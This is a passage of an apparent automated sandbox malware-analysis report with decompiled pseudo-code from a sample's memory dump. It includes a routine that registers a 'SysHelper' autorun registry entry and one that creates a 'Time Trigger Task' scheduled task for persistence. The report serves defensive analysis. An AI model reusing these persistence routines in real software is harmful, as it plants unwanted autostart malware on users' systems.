                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                    • API String ID: 122392481-4165002228
                                                                                                    • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                    • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                    • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                    • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 67%
                                                                                                    			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _t99;
                                                                                                    				signed int _t102;
                                                                                                    				signed int _t107;
                                                                                                    				intOrPtr* _t108;
                                                                                                    				intOrPtr _t110;
                                                                                                    				intOrPtr _t111;
                                                                                                    				intOrPtr _t112;
                                                                                                    				intOrPtr _t113;
                                                                                                    				intOrPtr _t115;
                                                                                                    				intOrPtr* _t116;
                                                                                                    				intOrPtr _t124;
                                                                                                    				intOrPtr* _t136;
                                                                                                    				intOrPtr _t148;
                                                                                                    				intOrPtr _t149;
                                                                                                    				intOrPtr _t160;
                                                                                                    				intOrPtr _t161;
                                                                                                    				intOrPtr _t162;
                                                                                                    				intOrPtr _t183;
                                                                                                    				intOrPtr _t185;
                                                                                                    				intOrPtr* _t188;
                                                                                                    				intOrPtr _t189;
                                                                                                    				intOrPtr* _t190;
                                                                                                    				intOrPtr* _t191;
                                                                                                    				intOrPtr _t192;
                                                                                                    				signed int _t193;
                                                                                                    				intOrPtr _t197;
                                                                                                    				intOrPtr* _t198;
                                                                                                    				intOrPtr* _t199;
                                                                                                    				intOrPtr* _t200;
                                                                                                    				intOrPtr* _t201;
                                                                                                    				intOrPtr* _t204;
                                                                                                    				intOrPtr _t207;
                                                                                                    				intOrPtr* _t208;
                                                                                                    				intOrPtr* _t210;
                                                                                                    				intOrPtr* _t213;
                                                                                                    				intOrPtr* _t219;
                                                                                                    				void* _t226;
                                                                                                    
                                                                                                    				_push(__ecx);
                                                                                                    				_t219 = __ecx;
                                                                                                    				_t213 = _a4;
                                                                                                    				_t188 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                    				if(_t188 < _t213) {
                                                                                                    					L102:
                                                                                                    					_push("invalid string position");
                                                                                                    					E0044F26C(__eflags);
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					return  *_t188;
                                                                                                    				} else {
                                                                                                    					_t183 = _a16;
                                                                                                    					_t99 =  *((intOrPtr*)(_a12 + 0x10));
                                                                                                    					if(_t99 < _t183) {
                                                                                                    						goto L102;
                                                                                                    					} else {
                                                                                                    						_t188 = _t188 - _t213;
                                                                                                    						_t207 =  <  ? _t188 : _a8;
                                                                                                    						_a8 = _t207;
                                                                                                    						_t185 =  <  ? _t99 - _t183 : _a20;
                                                                                                    						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
                                                                                                    						_v8 = _t102;
                                                                                                    						if((_t102 | 0xffffffff) - _t185 <= _v8) {
                                                                                                    							_push("string too long");
                                                                                                    							E0044F23E(__eflags);
                                                                                                    							goto L102;
                                                                                                    						} else {
                                                                                                    							_t189 = _t188 - _t207;
                                                                                                    							_t107 = _v8 + _t185;
                                                                                                    							_a20 = _t189;
                                                                                                    							_v8 = _t107;
                                                                                                    							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
                                                                                                    								_push(0);
                                                                                                    								E00415810(_t185, __ecx, _t213, _t107);
                                                                                                    								_t189 = _a20;
                                                                                                    								_t207 = _a8;
                                                                                                    							}
                                                                                                    							_t108 = _a12;
                                                                                                    							if(_t219 == _t108) {
                                                                                                    								__eflags = _t185 - _t207;
                                                                                                    								if(_t185 > _t207) {
                                                                                                    									__eflags = _a16 - _t213;
                                                                                                    									if(_a16 > _t213) {
                                                                                                    										__eflags = _t213 + _t207 - _a16;
                                                                                                    										_t110 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    										if(_t213 + _t207 > _a16) {
                                                                                                    											__eflags = _t110 - 0x10;
                                                                                                    											if(_t110 < 0x10) {
                                                                                                    												_a12 = _t219;
                                                                                                    											} else {
                                                                                                    												_a12 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t110 - 0x10;
                                                                                                    											if(_t110 < 0x10) {
                                                                                                    												_t190 = _t219;
                                                                                                    											} else {
                                                                                                    												_t190 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t207;
                                                                                                    											if(_t207 != 0) {
                                                                                                    												__eflags = _a12 + _a16;
                                                                                                    												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
                                                                                                    												_t207 = _a8;
                                                                                                    												_t226 = _t226 + 0xc;
                                                                                                    											}
                                                                                                    											_t111 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    											__eflags = _t111 - 0x10;
                                                                                                    											if(_t111 < 0x10) {
                                                                                                    												_a12 = _t219;
                                                                                                    											} else {
                                                                                                    												_a12 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t111 - 0x10;
                                                                                                    											if(_t111 < 0x10) {
                                                                                                    												_t191 = _t219;
                                                                                                    											} else {
                                                                                                    												_t191 =  *_t219;
                                                                                                    											}
                                                                                                    											_t112 = _a20;
                                                                                                    											__eflags = _t112;
                                                                                                    											if(_t112 != 0) {
                                                                                                    												__eflags = _t191 + _t213 + _t185;
                                                                                                    												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
                                                                                                    												_t226 = _t226 + 0xc;
                                                                                                    											}
                                                                                                    											_t113 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    											__eflags = _t113 - 0x10;
                                                                                                    											if(_t113 < 0x10) {
                                                                                                    												_a12 = _t219;
                                                                                                    											} else {
                                                                                                    												_a12 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t113 - 0x10;
                                                                                                    											if(_t113 < 0x10) {
                                                                                                    												_t208 = _t219;
                                                                                                    											} else {
                                                                                                    												_t208 =  *_t219;
                                                                                                    											}
                                                                                                    											_t192 = _a8;
                                                                                                    											_t115 = _t185 - _t192;
                                                                                                    											__eflags = _t115;
                                                                                                    											if(_t115 != 0) {
                                                                                                    												_push(_t115);
                                                                                                    												_push(_a12 + _a16 + _t185);
                                                                                                    												_t124 = _t213 + _t208 + _t192;
                                                                                                    												__eflags = _t124;
                                                                                                    												goto L96;
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											__eflags = _t110 - 0x10;
                                                                                                    											if(_t110 < 0x10) {
                                                                                                    												_a4 = _t219;
                                                                                                    											} else {
                                                                                                    												_a4 =  *_t219;
                                                                                                    												_t207 = _a8;
                                                                                                    											}
                                                                                                    											__eflags = _t110 - 0x10;
                                                                                                    											if(_t110 < 0x10) {
                                                                                                    												_a12 = _t219;
                                                                                                    											} else {
                                                                                                    												_a12 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t189;
                                                                                                    											if(_t189 != 0) {
                                                                                                    												__eflags = _a12 + _t213 + _t185;
                                                                                                    												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
                                                                                                    												_t207 = _a8;
                                                                                                    												_t226 = _t226 + 0xc;
                                                                                                    											}
                                                                                                    											_t197 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    											__eflags = _t197 - 0x10;
                                                                                                    											if(_t197 < 0x10) {
                                                                                                    												_t136 = _t219;
                                                                                                    											} else {
                                                                                                    												_t136 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t197 - 0x10;
                                                                                                    											if(_t197 < 0x10) {
                                                                                                    												_t198 = _t219;
                                                                                                    											} else {
                                                                                                    												_t198 =  *_t219;
                                                                                                    											}
                                                                                                    											__eflags = _t185;
                                                                                                    											if(_t185 != 0) {
                                                                                                    												_push(_t185);
                                                                                                    												_push(_t136 - _t207 + _a16 + _t185);
                                                                                                    												_t124 = _t198 + _t213;
                                                                                                    												goto L96;
                                                                                                    											}
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										_t148 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    										__eflags = _t148 - 0x10;
                                                                                                    										if(_t148 < 0x10) {
                                                                                                    											_a4 = _t219;
                                                                                                    										} else {
                                                                                                    											_a4 =  *_t219;
                                                                                                    											_t207 = _a8;
                                                                                                    										}
                                                                                                    										__eflags = _t148 - 0x10;
                                                                                                    										if(_t148 < 0x10) {
                                                                                                    											_a8 = _t219;
                                                                                                    										} else {
                                                                                                    											_a8 =  *_t219;
                                                                                                    										}
                                                                                                    										__eflags = _t189;
                                                                                                    										if(_t189 != 0) {
                                                                                                    											__eflags = _a8 + _t213 + _t185;
                                                                                                    											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
                                                                                                    											_t226 = _t226 + 0xc;
                                                                                                    										}
                                                                                                    										_t149 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    										__eflags = _t149 - 0x10;
                                                                                                    										if(_t149 < 0x10) {
                                                                                                    											_t210 = _t219;
                                                                                                    										} else {
                                                                                                    											_t210 =  *_t219;
                                                                                                    										}
                                                                                                    										__eflags = _t149 - 0x10;
                                                                                                    										if(_t149 < 0x10) {
                                                                                                    											_t199 = _t219;
                                                                                                    										} else {
                                                                                                    											_t199 =  *_t219;
                                                                                                    										}
                                                                                                    										__eflags = _t185;
                                                                                                    										if(_t185 != 0) {
                                                                                                    											_push(_t185);
                                                                                                    											_push(_a16 + _t210);
                                                                                                    											_t124 = _t199 + _t213;
                                                                                                    											goto L96;
                                                                                                    										}
                                                                                                    									}
                                                                                                    								} else {
                                                                                                    									_t160 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    									__eflags = _t160 - 0x10;
                                                                                                    									if(_t160 < 0x10) {
                                                                                                    										_a4 = _t219;
                                                                                                    									} else {
                                                                                                    										_a4 =  *_t219;
                                                                                                    									}
                                                                                                    									__eflags = _t160 - 0x10;
                                                                                                    									if(_t160 < 0x10) {
                                                                                                    										_t200 = _t219;
                                                                                                    									} else {
                                                                                                    										_t200 =  *_t219;
                                                                                                    									}
                                                                                                    									__eflags = _t185;
                                                                                                    									if(_t185 != 0) {
                                                                                                    										__eflags = _a4 + _a16;
                                                                                                    										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
                                                                                                    										_t207 = _a8;
                                                                                                    										_t226 = _t226 + 0xc;
                                                                                                    									}
                                                                                                    									_t161 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                                    									__eflags = _t161 - 0x10;
                                                                                                    									if(_t161 < 0x10) {
                                                                                                    										_a8 = _t219;
                                                                                                    									} else {
                                                                                                    										_a8 =  *_t219;
                                                                                                    									}
                                                                                                    									__eflags = _t161 - 0x10;
                                                                                                    									if(_t161 < 0x10) {
                                                                                                    										_t201 = _t219;
                                                                                                    									} else {
                                                                                                    										_t201 =  *_t219;
                                                                                                    									}
                                                                                                    									_t162 = _a20;
                                                                                                    									__eflags = _t162;
                                                                                                    									if(_t162 != 0) {
                                                                                                    										_push(_t162);
                                                                                                    										_push(_a8 + _t213 + _t207);
                                                                                                    										_t124 = _t201 + _t213 + _t185;
                                                                                                    										L96:
                                                                                                    										_push(_t124);
                                                                                                    										E004205A0();
                                                                                                    										goto L97;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                                    									_a8 = _t219;
                                                                                                    								} else {
                                                                                                    									_a8 =  *_t219;
                                                                                                    									_t213 = _a4;
                                                                                                    								}
                                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                                    									_a20 = _t219;
                                                                                                    								} else {
                                                                                                    									_a20 =  *_t219;
                                                                                                    									_t213 = _a4;
                                                                                                    								}
                                                                                                    								if(_t189 != 0) {
                                                                                                    									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
                                                                                                    									_t108 = _a12;
                                                                                                    									_t226 = _t226 + 0xc;
                                                                                                    								}
                                                                                                    								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
                                                                                                    									_t108 =  *_t108;
                                                                                                    								}
                                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                                    									_t204 = _t219;
                                                                                                    								} else {
                                                                                                    									_t204 =  *_t219;
                                                                                                    								}
                                                                                                    								if(_t185 != 0) {
                                                                                                    									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
                                                                                                    									L97:
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_t193 = _v8;
                                                                                                    							 *(_t219 + 0x10) = _t193;
                                                                                                    							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                                    								_t116 = _t219;
                                                                                                    								 *((char*)(_t116 + _t193)) = 0;
                                                                                                    								return _t116;
                                                                                                    							} else {
                                                                                                    								 *((char*)( *_t219 + _t193)) = 0;
                                                                                                    								return _t219;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}









































                                                                                                    0x00418003
                                                                                                    0x00418005
                                                                                                    0x00418008
                                                                                                    0x0041800b
                                                                                                    0x00418010
                                                                                                    0x00418342
                                                                                                    0x00418342
                                                                                                    0x00418347
                                                                                                    0x0041834c
                                                                                                    0x0041834d
                                                                                                    0x0041834e
                                                                                                    0x0041834f
                                                                                                    0x00418352
                                                                                                    0x00418016
                                                                                                    0x0041801a
                                                                                                    0x0041801d
                                                                                                    0x00418022
                                                                                                    0x00000000
                                                                                                    0x00418028
                                                                                                    0x0041802b
                                                                                                    0x0041802f
                                                                                                    0x00418039
                                                                                                    0x0041803c
                                                                                                    0x00418042
                                                                                                    0x00418044
                                                                                                    0x0041804f
                                                                                                    0x00418338
                                                                                                    0x0041833d
                                                                                                    0x00000000
                                                                                                    0x00418055
                                                                                                    0x00418058
                                                                                                    0x0041805a
                                                                                                    0x0041805c
                                                                                                    0x0041805f
                                                                                                    0x00418065
                                                                                                    0x00418067
                                                                                                    0x0041806c
                                                                                                    0x00418071
                                                                                                    0x00418074
                                                                                                    0x00418074
                                                                                                    0x00418077
                                                                                                    0x0041807c
                                                                                                    0x004180f3
                                                                                                    0x004180f5
                                                                                                    0x0041816a
                                                                                                    0x0041816d
                                                                                                    0x004181e3
                                                                                                    0x004181e6
                                                                                                    0x004181e9
                                                                                                    0x0041825e
                                                                                                    0x00418261
                                                                                                    0x0041826a
                                                                                                    0x00418263
                                                                                                    0x00418265
                                                                                                    0x00418265
                                                                                                    0x0041826d
                                                                                                    0x00418270
                                                                                                    0x00418276
                                                                                                    0x00418272
                                                                                                    0x00418272
                                                                                                    0x00418272
                                                                                                    0x00418278
                                                                                                    0x0041827a
                                                                                                    0x0041827f
                                                                                                    0x00418288
                                                                                                    0x0041828d
                                                                                                    0x00418290
                                                                                                    0x00418290
                                                                                                    0x00418293
                                                                                                    0x00418296
                                                                                                    0x00418299
                                                                                                    0x004182a2
                                                                                                    0x0041829b
                                                                                                    0x0041829d
                                                                                                    0x0041829d
                                                                                                    0x004182a5
                                                                                                    0x004182a8
                                                                                                    0x004182ae
                                                                                                    0x004182aa
                                                                                                    0x004182aa
                                                                                                    0x004182aa
                                                                                                    0x004182b0
                                                                                                    0x004182b3
                                                                                                    0x004182b5
                                                                                                    0x004182c3
                                                                                                    0x004182c6
                                                                                                    0x004182cb
                                                                                                    0x004182cb
                                                                                                    0x004182ce
                                                                                                    0x004182d1
                                                                                                    0x004182d4
                                                                                                    0x004182dd
                                                                                                    0x004182d6
                                                                                                    0x004182d8
                                                                                                    0x004182d8
                                                                                                    0x004182e0
                                                                                                    0x004182e3
                                                                                                    0x004182e9
                                                                                                    0x004182e5
                                                                                                    0x004182e5
                                                                                                    0x004182e5
                                                                                                    0x004182eb
                                                                                                    0x004182f0
                                                                                                    0x004182f0
                                                                                                    0x004182f2
                                                                                                    0x004182f4
                                                                                                    0x004182fd
                                                                                                    0x00418302
                                                                                                    0x00418302
                                                                                                    0x00000000
                                                                                                    0x00418302
                                                                                                    0x004181eb
                                                                                                    0x004181eb
                                                                                                    0x004181ee
                                                                                                    0x004181fa
                                                                                                    0x004181f0
                                                                                                    0x004181f2
                                                                                                    0x004181f5
                                                                                                    0x004181f5
                                                                                                    0x004181fd
                                                                                                    0x00418200
                                                                                                    0x00418209
                                                                                                    0x00418202
                                                                                                    0x00418204
                                                                                                    0x00418204
                                                                                                    0x0041820c
                                                                                                    0x0041820e
                                                                                                    0x0041821e
                                                                                                    0x00418221
                                                                                                    0x00418226
                                                                                                    0x00418229
                                                                                                    0x00418229
                                                                                                    0x0041822c
                                                                                                    0x0041822f
                                                                                                    0x00418232
                                                                                                    0x00418238
                                                                                                    0x00418234
                                                                                                    0x00418234
                                                                                                    0x00418234
                                                                                                    0x0041823a
                                                                                                    0x0041823d
                                                                                                    0x00418243
                                                                                                    0x0041823f
                                                                                                    0x0041823f
                                                                                                    0x0041823f
                                                                                                    0x00418245
                                                                                                    0x00418247
                                                                                                    0x00418254
                                                                                                    0x00418255
                                                                                                    0x00418256
                                                                                                    0x00000000
                                                                                                    0x00418256
                                                                                                    0x00418247
                                                                                                    0x0041816f
                                                                                                    0x0041816f
                                                                                                    0x00418172
                                                                                                    0x00418175
                                                                                                    0x00418181
                                                                                                    0x00418177
                                                                                                    0x00418179
                                                                                                    0x0041817c
                                                                                                    0x0041817c
                                                                                                    0x00418184
                                                                                                    0x00418187
                                                                                                    0x00418190
                                                                                                    0x00418189
                                                                                                    0x0041818b
                                                                                                    0x0041818b
                                                                                                    0x00418193
                                                                                                    0x00418195
                                                                                                    0x004181a5
                                                                                                    0x004181a8
                                                                                                    0x004181ad
                                                                                                    0x004181ad
                                                                                                    0x004181b0
                                                                                                    0x004181b3
                                                                                                    0x004181b6
                                                                                                    0x004181bc
                                                                                                    0x004181b8
                                                                                                    0x004181b8
                                                                                                    0x004181b8
                                                                                                    0x004181be
                                                                                                    0x004181c1
                                                                                                    0x004181c7
                                                                                                    0x004181c3
                                                                                                    0x004181c3
                                                                                                    0x004181c3
                                                                                                    0x004181c9
                                                                                                    0x004181cb
                                                                                                    0x004181d6
                                                                                                    0x004181d7
                                                                                                    0x004181d8
                                                                                                    0x00000000
                                                                                                    0x004181d8
                                                                                                    0x004181cb
                                                                                                    0x004180f7
                                                                                                    0x004180f7
                                                                                                    0x004180fa
                                                                                                    0x004180fd
                                                                                                    0x00418106
                                                                                                    0x004180ff
                                                                                                    0x00418101
                                                                                                    0x00418101
                                                                                                    0x00418109
                                                                                                    0x0041810c
                                                                                                    0x00418112
                                                                                                    0x0041810e
                                                                                                    0x0041810e
                                                                                                    0x0041810e
                                                                                                    0x00418114
                                                                                                    0x00418116
                                                                                                    0x0041811b
                                                                                                    0x00418124
                                                                                                    0x00418129
                                                                                                    0x0041812c
                                                                                                    0x0041812c
                                                                                                    0x0041812f
                                                                                                    0x00418132
                                                                                                    0x00418135
                                                                                                    0x0041813e
                                                                                                    0x00418137
                                                                                                    0x00418139
                                                                                                    0x00418139
                                                                                                    0x00418141
                                                                                                    0x00418144
                                                                                                    0x0041814a
                                                                                                    0x00418146
                                                                                                    0x00418146
                                                                                                    0x00418146
                                                                                                    0x0041814c
                                                                                                    0x0041814f
                                                                                                    0x00418151
                                                                                                    0x00418157
                                                                                                    0x0041815f
                                                                                                    0x00418163
                                                                                                    0x00418304
                                                                                                    0x00418304
                                                                                                    0x00418305
                                                                                                    0x00000000
                                                                                                    0x00418305
                                                                                                    0x00418151
                                                                                                    0x0041807e
                                                                                                    0x00418082
                                                                                                    0x0041808e
                                                                                                    0x00418084
                                                                                                    0x00418086
                                                                                                    0x00418089
                                                                                                    0x00418089
                                                                                                    0x00418095
                                                                                                    0x004180a1
                                                                                                    0x00418097
                                                                                                    0x00418099
                                                                                                    0x0041809c
                                                                                                    0x0041809c
                                                                                                    0x004180a6
                                                                                                    0x004180b9
                                                                                                    0x004180be
                                                                                                    0x004180c1
                                                                                                    0x004180c1
                                                                                                    0x004180c8
                                                                                                    0x004180ca
                                                                                                    0x004180ca
                                                                                                    0x004180d0
                                                                                                    0x004180d6
                                                                                                    0x004180d2
                                                                                                    0x004180d2
                                                                                                    0x004180d2
                                                                                                    0x004180da
                                                                                                    0x004180e9
                                                                                                    0x0041830a
                                                                                                    0x0041830a
                                                                                                    0x004180da
                                                                                                    0x00418311
                                                                                                    0x00418314
                                                                                                    0x00418318
                                                                                                    0x0041832a
                                                                                                    0x0041832e
                                                                                                    0x00418335
                                                                                                    0x0041831a
                                                                                                    0x0041831d
                                                                                                    0x00418327
                                                                                                    0x00418327
                                                                                                    0x00418318
                                                                                                    0x0041804f
                                                                                                    0x00418022

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                    • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                    • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                    • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                    • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 56%
                                                                                                    			E0040DAC0(char _a4, intOrPtr _a24) {
                                                                                                    				intOrPtr _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				void* _v20;
                                                                                                    				void* _v24;
                                                                                                    				void* _v28;
                                                                                                    				void* _v32;
                                                                                                    				void* _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v44;
                                                                                                    				intOrPtr _v60;
                                                                                                    				intOrPtr _v76;
                                                                                                    				short _v84;
                                                                                                    				intOrPtr _v88;
                                                                                                    				char _v92;
                                                                                                    				short _v20572;
                                                                                                    				void* _t61;
                                                                                                    				intOrPtr* _t63;
                                                                                                    				intOrPtr* _t65;
                                                                                                    				intOrPtr* _t67;
                                                                                                    				intOrPtr* _t69;
                                                                                                    				intOrPtr* _t71;
                                                                                                    				intOrPtr* _t73;
                                                                                                    				intOrPtr* _t75;
                                                                                                    				intOrPtr* _t83;
                                                                                                    				intOrPtr* _t85;
                                                                                                    				intOrPtr* _t87;
                                                                                                    				intOrPtr* _t93;
                                                                                                    				intOrPtr* _t95;
                                                                                                    				intOrPtr* _t97;
                                                                                                    				intOrPtr* _t98;
                                                                                                    				intOrPtr* _t100;
                                                                                                    				intOrPtr _t129;
                                                                                                    
                                                                                                    				 *[fs:0x0] = _t129;
                                                                                                    				_t61 = E0042F7C0(0x504c);
                                                                                                    				_v8 = 0;
                                                                                                    				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
                                                                                                    				if(_t61 >= 0) {
                                                                                                    					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
                                                                                                    					_t63 = _v24;
                                                                                                    					_push( &_v20);
                                                                                                    					_push(0x4d4f8c);
                                                                                                    					_push(0x4d4f9c);
                                                                                                    					_push(L"Time Trigger Task");
                                                                                                    					_push(_t63);
                                                                                                    					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
                                                                                                    						_t98 = _v24;
                                                                                                    						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
                                                                                                    						_t100 = _v24;
                                                                                                    						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
                                                                                                    					}
                                                                                                    					_t65 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
                                                                                                    					_t67 = _v36;
                                                                                                    					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
                                                                                                    					_t69 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
                                                                                                    					_t71 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
                                                                                                    					_t73 = _v20;
                                                                                                    					_t122 =  >=  ? _a4 :  &_a4;
                                                                                                    					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
                                                                                                    					_t75 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
                                                                                                    					_t78 =  >=  ? _a4 :  &_a4;
                                                                                                    					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
                                                                                                    					PathRemoveFileSpecW( &_v20572);
                                                                                                    					_t83 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
                                                                                                    					_t85 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
                                                                                                    					_t87 = _v20;
                                                                                                    					_v28 = 0;
                                                                                                    					_v32 = 0;
                                                                                                    					_v40 = 0;
                                                                                                    					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
                                                                                                    					E0042B420( &_v92, 0, 0x30);
                                                                                                    					_v88 = 0xb07e2;
                                                                                                    					_v92 = 0x30;
                                                                                                    					_t129 = _t129 + 0xc;
                                                                                                    					_v84 = 1;
                                                                                                    					_t93 = _v28;
                                                                                                    					_v76 = 0x21000c;
                                                                                                    					_v60 = 0;
                                                                                                    					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
                                                                                                    					_t95 = _v20;
                                                                                                    					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
                                                                                                    					_t97 = _v32;
                                                                                                    					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
                                                                                                    					__imp__CoUninitialize();
                                                                                                    				}
                                                                                                    				if(_a24 >= 8) {
                                                                                                    					_t61 = L00422587(_a4);
                                                                                                    				}
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return _t61;
                                                                                                    			}



































                                                                                                    0x0040dad6
                                                                                                    0x0040dadd
                                                                                                    0x0040dae4
                                                                                                    0x0040daeb
                                                                                                    0x0040daf3
                                                                                                    0x0040db0b
                                                                                                    0x0040db11
                                                                                                    0x0040db17
                                                                                                    0x0040db18
                                                                                                    0x0040db1d
                                                                                                    0x0040db24
                                                                                                    0x0040db29
                                                                                                    0x0040db2f
                                                                                                    0x0040db31
                                                                                                    0x0040db3c
                                                                                                    0x0040db3f
                                                                                                    0x0040db58
                                                                                                    0x0040db58
                                                                                                    0x0040db5b
                                                                                                    0x0040db6a
                                                                                                    0x0040db6c
                                                                                                    0x0040db76
                                                                                                    0x0040db79
                                                                                                    0x0040db88
                                                                                                    0x0040db8a
                                                                                                    0x0040db97
                                                                                                    0x0040db9a
                                                                                                    0x0040dba4
                                                                                                    0x0040dbac
                                                                                                    0x0040dbb2
                                                                                                    0x0040dbbd
                                                                                                    0x0040dbca
                                                                                                    0x0040dbd6
                                                                                                    0x0040dbe3
                                                                                                    0x0040dbe9
                                                                                                    0x0040dbf6
                                                                                                    0x0040dbfc
                                                                                                    0x0040dc07
                                                                                                    0x0040dc0a
                                                                                                    0x0040dc11
                                                                                                    0x0040dc1b
                                                                                                    0x0040dc22
                                                                                                    0x0040dc2d
                                                                                                    0x0040dc38
                                                                                                    0x0040dc42
                                                                                                    0x0040dc49
                                                                                                    0x0040dc4d
                                                                                                    0x0040dc55
                                                                                                    0x0040dc5c
                                                                                                    0x0040dc5f
                                                                                                    0x0040dc66
                                                                                                    0x0040dc71
                                                                                                    0x0040dc74
                                                                                                    0x0040dc83
                                                                                                    0x0040dc85
                                                                                                    0x0040dc8f
                                                                                                    0x0040dc92
                                                                                                    0x0040dc92
                                                                                                    0x0040dc9c
                                                                                                    0x0040dca1
                                                                                                    0x0040dca6
                                                                                                    0x0040dcac
                                                                                                    0x0040dcb6

                                                                                                    APIs
